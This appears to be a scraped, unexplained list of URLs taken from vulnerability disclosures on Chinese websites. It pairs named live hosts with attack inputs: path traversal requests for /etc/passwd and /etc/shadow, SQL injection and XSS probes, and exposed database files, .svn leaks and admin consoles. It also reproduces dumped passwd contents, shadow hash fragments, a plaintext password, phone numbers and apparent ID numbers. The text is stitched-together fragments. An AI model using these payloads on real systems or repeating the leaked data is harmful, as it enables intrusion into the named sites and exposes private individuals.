http://lipei.e-dicc.com.cn/autoclaim/jsp/picture/picture_single_view.jsp?filep=/nfs_vol4/image/2015/03/13/ff8080814c031955014c0be66b2860c1/big/2015-3-13_23441672.JPG http://cgi.voc.com.cn/app/mobile/push.php?action=get_article_threads&classid=1* http://cbs.cninsure.net/logon/Login.jsp http://cbs.cninsure.net http://183.224.241.26/exportExcelAction_deletePrintFile.action http://www.zmzb.com/ http://www.ccw.com.cn/article/get_eyan_comment http://www.hudai.com/ www.acunetix-referrer.com/javascript%253AdomxssExecutionSink%25280%252C%2522%2527%255C%2522%253E%253Cxsstag%253E%2528%2529refdxss%2522%2529%2Cr%3A%2Cmon%3Ahttp%3A//m8103.looyu.com/monitor%2Cp0%3Ahttp%253A//www.hudai.com/loan/loan E7F07168D5510DF0E8741451203EEF0B:FG=1 favorite:clipboard:email www.hudai.com http://zjy.ynjyy.cn/DigitalCampus/Stat/ZyShow_left.jsp?id=1 http://219.143.252.178/ http://219.151.48.208:80/ http://www.sklgdu.com/Data/db.mdb http://www.chuanjiang99.com/Data/db.mdb http://www.csmnt.org.cn/Data/db.mdb http://www.tlzey.com/Data/db.mdb http://www.luheng.com.cn/Data/db.mdb http://tjtiankai.com/Data/db.mdb http://www.zsltc.com/Data/db.mdb http://www.tsjjhotel.com/Data/db.mdb http://www.uniforce.cn/Data/db.mdb http://www.ht11-specialvalve.com/Data/db.mdb http://www.ftlib.cn/Data/db.mdb http://www.luheng.com.cn/Data/db.mdb http://www.gremount.com.cn/russian/Data/db.mdb http://www.sunvacationsy.com/Data/db.mdb http://tjdemo.east.net/yiminghuanbao/Data/db.mdb http://www.aetasia.com/Data/db.mdb http://www.ht11-specialvalve.com/Data/db.mdb http://www.bjdchs.com/Data/db.mdb http://www.jx-camera.com/Data/db.mdb http://www.bjdyswhg.com/Data/db.mdb http://www.tjmcy.com/Data/db.mdb http://www.huarichongyin.com.cn/Data/db.mdb http://manage.kktv8.com:9595/applyServer/web/apply/list/2?accessCode=3CFA35 http://manage.kktv8.com:9595/applyServer/web/apply/list/9?accessCode=66D308 http://joycitycrmws.cofco.com:8084/WebAppQuery.asmx?op=GrtBuildinfo 
http://joycitycrmws.cofco.com:8084/WebAppQuery.asmx?op=Getstorecodebydate http://joycitycrmws.cofco.com:8084/WebAppQuery.asmx?op=Getstatistics http://joycitycrmws.cofco.com:8084/WebAppQuery.asmx?op=Getbudingbymonframe http://joycitycrmws.cofco.com:8084/WebAppQuery.asmx?op=GetbudingDayamtfram http://joycitycrmws.cofco.com:8084/WebAppQuery.asmx?op=GetallSalesamt http://joycitycrmws.cofco.com:8084/WebAppQuery.asmx?op=GetStoredaySalseAmt http://joycitycrmws.cofco.com:8084/WebAppQuery.asmx?op=GetStoreMonthSalseNobyAmt http://joycitycrmws.cofco.com:8084/WebAppQuery.asmx?op=GetStoreMonthSalseNobName http://joycitycrmws.cofco.com:8084/WebAppQuery.asmx?op=GetStoreMonthSalseInfo http://joycitycrmws.cofco.com:8084/WebAppQuery.asmx?op=GetStoreMonthSalseAmt http://joycitycrmws.cofco.com:8084/WebAppQuery.asmx?op=GetIndustrybymonframe http://joycitycrmws.cofco.com:8084/WebAppQuery.asmx?op=GetDayIndustrybydatefram http://joycitycrmws.cofco.com:8084/WebAppQuery.asmx?op=GetDayIndustry http://joycitycrmws.cofco.com:8084/WebAppQuery.asmx?op=GetBuildDatabyCondition http://joycitycrmws.cofco.com:8084/WebAppQuery.asmx?op=GetBuildData http://joycitycrmws.cofco.com:8084/WebAppQuery.asmx?op=GetBrandbydate http://joycitycrmws.cofco.com:8084/WebAppQuery.asmx?op=GetBrandBytimeframe http://joycitycrmws.cofco.com:8084/WebAppQuery.asmx?op=GetBrandBymonframe http://joycitycrmws.cofco.com:8084/WebAppQuery.asmx?op=GetAnchorStoreSalse http://**.**.**.**/bugs/wooyun-2015-0117447 http://**.**.**.**/index.php?file=service&smid=37 POST:wid=519 http://**.**.**.**/template/template.php https://npass.dongfeng-nissan.com.cn/manage/password/showForgotPassword.htm http://www.youshang.com/ http://zone.wooyun.org/content/22136 http://bbs.aili.com/plugin.php?id=pointsMall:index&type=id app.finance.ifeng.com/gszb/person_ifeng.php?id=152 https://github.com/710270532/python/blob/ee03d64ca8af16fcf07f4f3f39eb8935ffcd28f7/utils/mail.py http://www.wochacha.com 
www.wochacha.com\/login\/?redirectURL=aHR0cDovL3d3dy53b2NoYWNoYS5jb20v http://**.**.**.**/web/login.asp http://183.60.198.202:8080/script http://180.168.34.2:8080/script http://www.cwan.com/ www.wochacha.com http://www.dqhr.gov.cn/fileDownload.jsp?fileName=../../../../../etc/passwd http://www.dqhr.gov.cn/fileDownload.jsp?fileName=../../../../../etc/shadow root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin rpc:x:32:32:Portmapper user:/:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous User:/var/lib/nfs:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash pcap:x:77:77::/var/arpwatch:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin avahi:x:70:70:Avahi daemon:/:/sbin/nologin hsqldb:x:96:96::/var/lib/hsqldb:/sbin/nologin avahi-autoipd:x:100:101:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin xfs:x:43:43:X Server:/etc/X11/fs:/sbin/nologin gdm:x:42:42::/var/gdm:/sbin/nologin sabayon:x:86:86:Sabayon user:/home/sabayon:/sbin/nologin 
flnian:x:500:500::/home/flnian:/bin/bash panwq0459:x:501:501::/home/panwq0459:/bin/bash O9Ez1dcIuwhUVaWSkR7aG1:16052:0:99999:7 gUr53um0:16052:0:99999:7 EglNM0:16056:0:99999:7 http://timber2005.com/ http://timber2005.com/Customer.html http://exam1.timber2005.com http://exam1.timber2005.com/Paper/Paper_Manage.aspx?action=view&infoid=303 http://exam1.timber2005.com/Paper/Paper_Type_Random_Query.aspx?return=../Paper/Paper_Query.aspx&pid=305 http://exam1.timber2005.com/Exam/Exam_Type_Right.aspx?infoid=35 http://202.96.191.190:8081/outside/SearchOrder.aspx http://**.**.**.**/.svn/entries http://api.iron.meiliwu.com/customer/sendVerify?account=18518551855&c_d=2&c_p=ios&c_s=6135f04b&c_u=DB767BCF-9559-40D6-8C83-CC3ABCB342D1&c_v=1.0.0&code=edqc&env=prod http://da.wochacha.com/index.php/da/ajax/login?_dc=1438674485757&user=admin*&pwd=admin&page=1&start=0&limit=25 http://jwc.gdupt.edu.cn/lang/entry/admin_list.php http://www.dqhr.gov.cn/yiliaobaoxianyaopin!getlist.action?name=2 http://oa.guanhao.com:8080/kingdee/file/file_sms_history.jsp?user_id=1 http://oa.guanhao.com:8080/kingdee/file/getSerialNumber.jsp?cplei_id=1 http://oa.guanhao.com:8080/kingdee/flow_design/flow_class_custom_add.jsp?class_id=1 http://oa.guanhao.com:8080/kingdee/flow_design/flow_class_custom_submit.jsp?class_id=1&action=delete http://221.226.149.17:8080/kingdee/login/loginpage.jsp http://122.139.60.103:800/kingdee/login/loginpage.jsp http://oa.guanhao.com:8080/kingdee/login/loginpage.jsp http://222.179.238.182:8082/kingdee/login/loginpage2.jsp http://222.134.77.23:8080/kingdee/login/loginpage.jsp http://221.4.245.218:8080/kingdee/login/loginpage.jsp http://221.226.149.17:8080/kingdee/login/loginpage.jsp http://220.189.244.202:8080/kingdee/login/loginpage.jsp http://222.133.44.10:8080/kingdee/login/loginpage.jsp http://223.95.183.6:8080/kingdee/login/loginpage.jsp http://61.190.20.51/kingdee/login/loginpage.jsp http://60.194.110.187/kingdee/login/loginpage.jsp http://oa.roen.cn/kingdee/login/loginpage.jsp 
http://pan.baidu.com/share/home?uk=755521925#category/type=0 http://zs.njust.edu.cn/newzs/manage/articlecount.asp?id=45959 http://**.**.**.**/) http://**.**.**.**:8083/finance80/monitor/title_report_cx.jsp?village_dm=1 http://tmqx.gov.cn/Manage http://**.**.**.**/rzgl/admin/attestation/applicationmanage/attestationinfomanage/apply/newApplyStep03.jsp?actionType=add http://**.**.**.**/rzgl/admin/attestation/applicationmanage/attestationinfomanage/apply/newApplyStep03.jsp?actionType=add http://**.**.**.**/UpLoadFiles/DocumentFiles/5252/20150804211457130053.aspx http://xiaodu.baidu.com/setting/?v=1438694346084 http://110.249.218.68:8090/hbwebxf/ http://218.27.137.242:8080/Server/CmxCS.php?pgid=CS_Remove http://218.27.137.242:8080/Server/CmxGetAppNameByUserName.php?User=1&Pass=1 http://218.27.137.242:8080/ http://222.177.213.190:8888/ http://117.132.15.88:8001/ http://221.224.116.210:81/ http://221.238.243.237:8000/ http://**.**.**.**/admin/ http://www.itestin.com/.svn/entries http://www.itestin.com/images/.svn/entries http://newhome.testin.cn/.svn/entries http://118.194.236.11:8081/projects http://uhome.haier.net:7330/portal/operate/userinfo/registerlist.do http://oa.galaxyasset.com/ResourceFiles/images/login/../../WEB-INF/web.xml http://go189.cn/ http://report.renrenche.com/?resource=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd&proc=2 http://www.jxmkaqjc.gov.cn/kjzb/aqkj/201111/t20111125_189483.htm http://www.datebao.com/personal/center/family/1/edit http://www.datebao.com/personal/center/family/182301/edit https://github.com/tradeplat/pyscript/blob/732b34803559d01149417eae36184ca225a32773/OCR_qh.py http://www.soueast-motor.com/主站 http://61.131.6.228:8001/console http://61.131.6.228:8001/wls_Server/a.jsp http://www.soueast-motor.com/test.txt http://www.jjwxc.net/search.php?kw=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&t=1&submit=%B2%E9%D1%AF http://kf.uuzuonline.com/yzsdkcs/question/view/id/30466 http://kf.uuzuonline.com/yzsdkcs/question/view/id/30466 
http://kf.uuzuonline.com/yzsdkcs/question/view/id/30466 http://ko.7daysinn.cn:7711/login.aspx?appID=87&sReturnUrl=http://in.7daysinn.cn/default.aspx http://member.7daysinn.cn:7713/BelongingMebWeb/Pages/UserLogin.aspx?ReturnUrl=http%3a%2f%2fmember.7daysinn.cn%3a7713%2fBelongingMebWeb%2fpages%2fDefault.aspx http://legend.7daysinn.cn/ http://f16.7daysinn.cn:8080/ http://mt.7daysinn.cn/LoginPage.aspx http://plm.7daysinn.cn/account/login.action http://wc.7daysinn.cn:8080/login http://aoe.7daysinn.cn/login http://crm.7daysinn.cn/ http://ms.7daysinn.cn/7/login;jsessionid=FF2288D532BC7AD9D71B0ACD369B7F01#view=login http://study.plateno.com/ http://scm.plateno.cc:8080/main/index#frm=%2Findex_frm http://sa.7daysinn.cn:8080/sale http://b29.plateno.cc:7700/ http://z.xywy.com/dhyslist.htm?city=1&page=5&province=1&search=1&search_keyword=1&speciality1=2&speciality2=1&time=1&price=1 http://ipo.snnu.edu.cn/newsinfo.asp?id=344 http://114.251.251.39/ http://st.hxlife.com http://www.lnredcross.org.cn/bbs/boke/Data/Dvboke.mdb http://www.lnredcross.org.cn/database/%23newasp.mdb http://221.10.28.84:22343/hxtextform_scda/login.jsp http://221.10.28.84:22343/hxtextform_scda/config-browser/showConfig.action http://www.glsc.com.cn/glzq/financing/management/newMother.jsp?fundcode=B40088 http://www.glsc.com.cn/glzq/newCms.do?whichCat=gsdt&method=getNewsPage http://www.glsc.com.cn/glzq/question.do?method=getQuestionByKeyCode2&keyCode=question_gltb http://mail.seu.edu.cn/ http://182.92.10.222/sendMarketingMsgs?productNo=112&mobiles=******&msgContent=hello_wooyun http://creative.pptv.com/creative/detail?id=22 http://zzwjj.gov.cn/ http://www.china-galaxy-inv.com/ www.china-galaxy-inv.com http://sw.gacmotor.com/sw/login-query.action http://med.tcl.com/tcl.rar http://battery.tcl.com/read_news.php?id=25 http://multimedia.tcl.com/en/.svn/entries http://www.ezucoo.com/myezccenter/PersonalInformationShow/PersonalInformationUpdate m153.looyu.com/monitor http://**.**.**.**/cms/cms/infopub/channelpre.jsp 
http://**.**.**.**/cms/cms/infopub/channelpre.jsp http://**.**.**.**/cms/cms/infopub/channelpre.jsp http://**.**.**.**/cms/cms/infopub/channelpre.jsp http://**.**.**.**/cms/cms/infopub/channelpre.jsp http://**.**.**.**/cms/cms/infopub/channelpre.jsp http://**.**.**.**/cms/cms/infopub/channelpre.jsp http://**.**.**.**:8088/cms/cms/infopub/channelpre.jsp http://**.**.**.**/cms/cms/infopub/channelpre.jsp http://**.**.**.**/cms/cmsadmin/infopub/channelpre.jsp http://**.**.**.**/cms/cms/infopub/channelpre.jsp http://**.**.**.**/cms/cms/infopub/infopre.jsp?pubtype=D&pubpath=cn&infoid=1427161015029071&templetid=1178737873571110&channelcode=A012406 http://**.**.**.**/cms/cms/infopub/infopre.jsp?pubtype=D&pubpath=women&infoid=1420769259833265&templetid=1370591279687569&channelcode=A120101 http://**.**.**.**/cms/cms/infopub/infopre.jsp?pubtype=D&pubpath=hnzbcg&infoid=1427249525231904&templetid=1210753703820118&channelcode=A080305 http://**.**.**.**/cms/cms/infopub/infopre.jsp?pubtype=D&pubpath=xykj&infoid=1435109524005376&templetid=1431914538524590&channelcode=A13010402&userId=10002 http://**.**.**.**/cms/cms/infopub/infopre.jsp?pubtype=D&pubpath=zsjgyey&infoid=1421716411705260&templetid=1407293364068949&channelcode=A13010201 http://**.**.**.**/cms/cmsadmin/infopub/infopre.jsp?pubtype=D&pubpath=gjsb&infoid=1410924314703164&templetid=1395901402388359&channelcode=A092003 http://**.**.**.**/cms/cms/infopub/infopre.jsp?pubtype=D&pubpath=portal&infoid=1353296177896134&templetid=1248920904974712&channelcode=A07050753&userId=10002 http://**.**.**.**/gips/cms/infopub/infopre.jsp?pubtype=D&pubpath=A08&infoid=1220333754650169&templetid=1219033608284547&channelcode=A084801&userId=10002 http://**.**.**.**/cms/cms/infopub/infopre.jsp?pubtype=D&pubpath=null&infoid=1225677064478517&templetid=1179950253073606&channelcode=A010119041010 http://**.**.**.**/cms/cms/infopub/infopre.jsp?pubtype=D&pubpath=portal&infoid=1421892149404164&templetid=1193399467902511&channelcode=A090120030501 
http://**.**.**.**/cms/cms/infopub/indexpre.jsp?pubtype=D&pubpath=xykj&webappcode=A13&templetid=1416883303056402&userId=10002 http://**.**.**.**/cms/cms/infopub/indexpre.jsp?pubtype=D&pubpath=cn&webappcode=A01&templetid=1169889841499167 http://**.**.**.**/cms/cms/infopub/indexpre.jsp?pubtype=D&pubpath=hnzbcg&webappcode=A08&templetid=1210753703820116 http://**.**.**.**/cms/cms/infopub/indexpre.jsp?pubtype=D&pubpath=women&webappcode=A12&templetid=1370591279571221&userId=10002 http://**.**.**.**/cms/cms/infopub/indexpre.jsp?pubtype=D&pubpath=portal&webappcode=A07&templetid=1413160234663065&userId=10002 http://bzkzs.ccut.edu.cn/ccgdzs/webdo/img/imglist.do http://bzkzs.ccut.edu.cn/ccgdzs/webdo/menu/menubycid.do http://bzkzs.ccut.edu.cn/ccgdzs/webdo/menu/menulist.do http://bzkzs.ccut.edu.cn/ccgdzs/webdo/article/articlelist.do http://bzkzs.ccut.edu.cn/ccgdzs/webdo/article/onearticle.do http://bzkzs.ccut.edu.cn/ccgdzs/webdo/img/imglist.do http://bzkzs.ccut.edu.cn/ccgdzs/webdo/menu/menubycid.do http://bzkzs.ccut.edu.cn/ccgdzs/webdo/menu/menulist.do http://bzkzs.ccut.edu.cn/ccgdzs/webdo/student/studentlist.do https://**.**.**/por/login_psw.csp http://218.17.200.230/ root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/bin/bash daemon:x:2:2:Daemon:/sbin:/bin/bash lp:x:4:7:Printing daemon:/var/spool/lpd:/bin/bash mail:x:8:12:Mailer daemon:/var/spool/clientmqueue:/bin/false games:x:12:100:Games account:/var/games:/bin/bash wwwrun:x:30:8:WWW apache:/var/lib/wwwrun:/bin/false ftp:x:40:49:FTP account:/srv/ftp:/bin/bash nobody:x:65534:65533:nobody:/var/lib/nobody:/bin/bash messagebus:x:100:101:User D-BUS:/var/run/dbus:/bin/false haldaemon:x:101:102:User haldaemon:/var/run/hal:/bin/false man:x:13:62:Manual viewer:/var/cache/man:/bin/bash news:x:9:13:News system:/etc/news:/bin/bash uucp:x:10:14:Unix-to-Unix system:/etc/uucp:/bin/bash at:x:25:25:Batch daemon:/var/spool/atjobs:/bin/bash sshd:x:71:65:SSH daemon:/var/lib/sshd:/bin/false postfix:x:51:51:Postfix 
Daemon:/var/spool/postfix:/bin/false ntp:x:74:103:NTP daemon:/var/lib/ntp:/bin/false gdm:x:50:104:Gnome daemon:/var/lib/gdm:/bin/false suse-ncc:x:102:105:Novell User:/var/lib/YaST2/suse-ncc-fakehome:/bin/bash wlgma:x:1000:1000::/home/wlgma:/bin/bash http://www.1218.com.cn/administrator.php/ http://192.168.0.250/administrator.php/common/login/index.php?back=http://192.168.0.250/administrator.php www.1218.com.cn域名就可以正常使用了。 http://www.1218.com.cn/administrator.php/common/login/index.php?back=http://192.168.0.250/administrator.php display:none administrator.php/common/login/check_login.php www.1218.com.cn http://www.acc.gov.cn/portal/skin/template/query/CPA_ACCT_PUNISHServlet?CPA_CNO=310000072984 http://cafe.testin.cn/?/ http://www.mtestin.com/feedback/info/1728 www.mtestin.com http://www.mtestin.com http://callcenter.dongfeng-nissan.com.cn/login.aspx http://ll800.go189.cn http://ll800.go189.cn/ll800/order/temp.ajax?path=../../../etc/passwd http://go189.cn/emall http://go189.cn/emall/emall/member/getPassWordResult.html?customerid=4028f4c44801bb0c01480c2aa99e002d&email=15312021313@189.cn http://go189.cn/emall/userManage/setCustomerPwd.do http://www.jjwxc.cn/ https://github.com/pku9104038/apkstore_server/blob/3d7239a72c75d09a38c585e2b3f875768b99ce45/conf/smtp_conf.xml https://github.com/710270532/python/blob/f7767caf603d27c665fef696e96dd07702e1e658/test.py http://app.dianmiaoshou.com/web/ http://www.wanda.cn/ http://www.mcqyy.com/RunCode/python/ http://219.143.252.250:8080/ http://221.181.13.16/login.action http://www.hnheyin.com/zjjl.aspx?lx=&st=&et= www.hnheyin.com https://github.com/rover0321/emailSender/blob/925c5cbd5feaa79275e5ef30a3e9d97cfb795fa9/email.properties www.jzjtgl.com/wap/browwordmessage.jspprogram_code=51 http://www.jjwxc.cn https://github.com/speckle/OA/blob/ed9a25dab21a1d8b83f6bc8832bc5d6b7e9c055a/protected/config/params.php http://cnfc.happyelements.com/site/login http://www.rd.uestc.edu.cn/index.php?c=about&id=17 
http://zjl.chinapost.com.cn:80/servlet/MessageFileServlet?act=1&name=135791&t=1438755938685&snumber=1 www.insissue.com https://github.com/XiaoEDaiKuan/xiao-e-dai-kuan-site-app/blob/c01ecd983fbe117b34706f33a6d8a3cc09d8d778/src/main/resources/mail.properties http://ebs.chnzb.cn/ http://www.e-cinda.com http://lszds.lsz.gov.cn/ http://lszds.lsz.gov.cn/install/ab.php http://**.**.**.**/qcar/checkUser.do https://github.com/triompha/python_learn/blob/master/cir_mathion.py http://xinyong.rizhaocom.gov.cn http://xinyong.rizhaocom.gov.cn/install/test.php http://**.**.**.**/fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=/fckeditor/editor/filemanager/connectors/aspx/connector.aspx http://**.**.**.**/fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=/fckeditor/editor/filemanager/connectors/aspx/connector.aspx http://**.**.**.**/fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=/fckeditor/editor/filemanager/connectors/aspx/connector.aspx www.xh99d.com https://**.**.**.**/huanggit/gidcloud/blob/0d3869618e78a9dd4d73cd5259b7e9ba940df3a1/src/main/resources/config.properties http://eyemain.znv.com/wq/login.action http://androidcn.fortuna.happyelements.cn/lua/200009.jsp?pw=1234qwer!&uid=1502902843 http://androidcn.fortuna.happyelements.cn/lua/error.jsp?redirect=%2Flua%2F200009.jsp http://61.178.81.162:8888/LQL_OA/login.aspx http://www.zhaoxincfu.com/index.php?user&q=login www.zhaoxincfu.com web.7k7k.com/games/huodong/touch/fzsjds2/show.php?id=622 http://www.jjwxc.cn/research/index http://hi.gtja.com/ http://hi.gtja.com/index.php?m=admin&c=index&a=login&pc_hash= http://www.mangocity.com/index.php?d=search&c=search_controller&m=index&keyword=1 http://www.moneydai.com/Account/msgdetail?mid=1 http://www.moneydai.com/Account/msgdetail?mid=1 https://github.com/HurricaneTong/FDU_SMP/blob/105aff7874eeb1e1de50ed2ba62c7abce96881be/resources/config/mail.properties http://www.jjwxc.cn 
http://www.kuwo.cn/US/login.htm http://www.jjwxc.cn/admin/login/index http://images.wandafilm.com/phpmyadmin/setup/index.php?page=config http://images.wandafilm.com/phpmyadmin/setup/index.php http://103.255.94.36:9090/index.jsp https://**.**.**.**/ilovezy/cc-jqFileUpload/blob/88be79d955755c1e619703cb7063b0d9b11de8fa/server/php/files/%25E4%25BC%2581%25E4%25B8%259A%25E9%2582%25AE%25E7%25AE%25B1.txt http://**.**.**.**/ToolsMgr/ http://**.**.**.**:7006/DispatchServer/DispatchService.asmx http://**.**.**.**/Login soap:Envelope xmlns:xsi="http://**.**.**.**/2001/XMLSchema-instance xmlns:xsd="http://**.**.**.**/2001/XMLSchema xmlns:soap="http://**.**.**.**/soap/envelope/ soap:Body http://**.**.**.**/ soap:Body soap:Envelope http://**.**.**.**:7006/DispatchServer/DispatchService.asmx http://**.**.**.**/Login soap:Envelope xmlns:xsi="http://**.**.**.**/2001/XMLSchema-instance xmlns:xsd="http://**.**.**.**/2001/XMLSchema xmlns:soap="http://**.**.**.**/soap/envelope/ soap:Body http://**.**.**.**/ http://jw.nankai.edu.cn/video.php?id=692 www.carwings-nissan.com.cn/index.php/News/index/nid/9 http://**.**.**.**/ http://**.**.**.**/aqqx/ http://**.**.**.**/pjbj/)使用的是同一款软件,在用户名处存在注入 http://**.**.**.**/aqqx/ http://58.61.160.7:8080/ http://www.ieg.ynu.edu.cn/admin/admin_login.asp http://mooninbox.com/order/seeOrderDetail.action?orderType=1&oid=73 http://14.17.109.153/weihui_admin/feedback/list http://14.17.109.153/weihui_admin/feedback/list http://14.17.109.153/weihui_admin/feedback/list http://www.thinksaas.cn/service/down/ http://otc.shisu.edu.cn/main/Showclass.asp?classID=46 http://zh.yilibabyclub.com/admin http://college.weimob.com/class.php?id=3 http://**.**.**.**/Comm/UploadFile/webUpload.aspx?AttId=x.cer&FilePath=/../web/ http://zyyd.media.open.com.cn/picexam/examshowpic_moni.asp?index_id=94&picid=@@version&od=3 DAV:sql Host:113.108.111.235 http://**.**.**.**/Front/content.aspx?typeid=6 http://**.**.**.**/Front/content.aspxtypeid=6%27%00and%00%271%27=%271 www2.baidu.com 
http://www.gtarsc.com/ http://www.gtarsc.com/Login/GetImage?key=../../../../../../../../../../windows/win.ini http://www.gtarsc.com/Login/GetImage?key=../../../../../../../../../../windows/System32/drivers/etc/hosts http://219.143.118.112:8080/YJZHCL/login.jsp www.cool170.com) http://wms.fday.co/account/login http://nx.gtja.com/ http://wooyun.org/bugs/wooyun-2010-0130601 http://210.14.78.115/ http://210.14.78.115/page/maint/login/Page.jsp?templateId=8&logintype=1&gopage=&message=55 http://218.28.13.73:7001/console http://218.28.13.73:7001/mytree http://m.tiexue.net/3G/Login.aspx这个是铁血网3G的登陆接口,可以看到没有任何限制策略 http://sbm.pumc.edu.cn http://sbm.pumc.edu.cn/Article_Shows.asp?photoid=276 URL:http://sbm.pumc.edu.cn/User_ChkLogin.asp URL:http://sbm.pumc.edu.cn/vote.asp http://ykyyb.pumc.edu.cn/remark.php?doc_id=3283 http://ykyyb.pumc.edu.cn/remark.php?doc_id=3283 http://**.**.**.**/list.jsp?col=0存在SQL注入漏洞 http://**.**.**.**/user/login.action http://**.**.**.**/deptemplates/public/jsp/adshow.jsp?typecode=002003076001002&width=558&height=80 http://**.**.**.**/deptemplates/public/jsp/adshow.jsp?typecode=002003110001002&width=714&height=83 http://**.**.**.**/deptemplates/public/jsp/adshow.jsp?typecode=002003063001002&width=744&height=83 http://**.**.**.**/deptemplates/public/jsp/adshow.jsp?typecode=002006009001002&width=714&height=83 http://**.**.**.**/deptemplates/public/jsp/adshow.jsp?typecode=002003102001002&width=714&height=83 http://**.**.**.**/deptemplates/public/jsp/adshow.jsp?typecode=002003083001002&width=558&height=80 http://**.**.**.**/deptemplates/public/jsp/adshow.jsp?typecode=002003076001002&width=558&height=80 http://**.**.**.**/deptemplates/public/jsp/adshow.jsp?typecode=002003083001002&width=558&height=80 http://**.**.**.**/deptemplates/public/jsp/adshow.jsp?typecode=002003076001002&width=558&height=80 http://**.**.**.**/deptemplates/public/jsp/adshow.jsp?typecode=002003076001002&width=558&height=80 
http://**.**.**.**/deptemplates/public/jsp/adshow.jsp?typecode=002003083001002&width=558&height=80 http://202.115.194.254/phpmyadmin/ http://w.189.cn/login.jsp http://gw.imufe.edu.cn/gw/admin/ http://222.210.108.226:6101/CDLF/app_page/MainApp.html http://27.17.51.78:8400 http://www.nxyqs.com/ http://www.nxyqs.com/newexam/login.aspx http://**.**.**.**/bugs/wooyun-2010-044619 http://**.**.**.**/xmjs.aspx?id=10 http://alwayson.hp.com.cn/AAS/ http://alwayson.hp.com.cn/AAS/CsoInfo.aspx?no=BJZC728851&id=1 http://alwayson.hp.com.cn/AAS/CsoInfo.aspx?no=BJZC728831%27&id=1 http://www.skyworth-ea.com/install/ http://www.skyworth-ea.com/SysAdmin/Login.aspx http://www.skyworth-ea.com:80/cn/about/development.aspx?nodecode= http://www.skyworth-ea.com/cn/humanresource/employment.aspx http://www.skyworth-ea.com/cn/product/productdetail.aspx?id=10000011734487 http://www.skyworth-ea.com/cn/product/index.aspx?nodecode=105007002 http://www.skyworth-ea.com/en/search.aspx?val=a http://www.skyworth-ea.com/en/product/category.aspx?nodecode=105012001003 http://www.skyworth-ea.com/en/news/newsdetail.aspx?id=100000030389525&nodecode=105011001 http://www.skyworth-ea.com/UploadFiles/main/Files/2015/8/20150805185555.aspx http://www.skyworth-ea.com/UploadFiles/main/Files/2015/8/20150805185438.aspx http://b2b.cits.com.cn/citsonlineWeb/online/messageBBS/openFile.jsp?&fileName=../../../../etc/passwd http://www.dfmg.com.cn/scn/NewsDetail.aspx?ID=3396 http://sso.pudong.gov.cn:5203/cas/login?service=http%3A%2F%2Fusercenter.pudong.gov.cn%2Fwebsite%2Fusercenter%2F http://mail.pudong.gov.cn:8080/owaloginweb/Default.aspx http://u.tm.gamebbs.renren.com/data/config.inc.bak URL:http://121.10.6.161:8080/jnjdbm/platform/login!login.action http://**.**.** exchanger:mx2.qiye.163.com exchanger:mx.qiye.163.com http://person.sac.net.cn/pages/retrievePassword/passwordreset.html?String=01&println=C20347&emi_paper_no2=31010919870930352X&template=10061154048 
http://person.sac.net.cn/pages/retrievePassword/passwordreset.html?String=01&println=C08075&emi_paper_no2=339005198201081840&template=39908079 http://person.sac.net.cn http://www.csnjy.com/index.asp http://www.csnjy.com/about.asp?title=%D7%DC%BE%AD%C0%ED%D0%C2%C4%EA%D6%C2%B4%C7&id=224 http://www.csnjy.com/productshow.asp?id=193 http://www.csnjy.com/clture.asp?title=%B9%AB%CB%BE%B1%EA%CA%B6&id=32 http://www.csnjy.com/partioshow.asp?id=251&tb=edu&bigclassname=%B5%B3%BD%A8%B9%A4%D7%F7 http://www.csnjy.com/lawshow.asp?id=240&tb=dongtai&bigclassname=%B9%FA%BC%D2%B7%A8%B9%E67 http://www.csnjy.com/newshow.asp?id=440&tb=news&bigclassname=%D7%EE%D0%C2%B6%AF%CC%AC http://www.csnjy.com/videoshow.asp?id=145&tb=dongtai http://www.csnjy.com/cllist.asp?c=1 http://www.csnjy.com/cshow.asp?id=102&tb=brandproduct&c=1 http://www.csnjy.com/special.asp?bigclassname=%B0%B2%C8%AB%C9%FA%B2%FA&id=56 http://www.csnjy.com/news.asp?bigclassname=%D7%EE%D0%C2%B6%AF%CC%AC&id=60 http://www.csnjy.com/products.asp?bigclassname=%D0%A1%CA%B3%C6%B7%C0%E0&id=75 http://www.csnjy.com/partio_list.asp?bigclassname=%B5%B3%BD%A8%B9%A4%D7%F7 http://www.csnjy.com/law_list.asp?bigclassname=%B9%FA%BC%D2%B7%A8%B9%E6 http://**.**.**.**:8081 http://**.**.**.**/Supplier/UploadFile.aspx http://**.**.**.**/d.asp http://api.xgo.com.cn/vote_arrnew.php?voteid=82 http://search.10jqka.com.cn/diag/concept-detail?conceptId=300433 https://220.189.211.10/diag/concept-detail?conceptId=300433 http://s.10jqka.com.cn/diag/concept-detail?conceptId=300920 shop.ali213.com/getkey/old.html 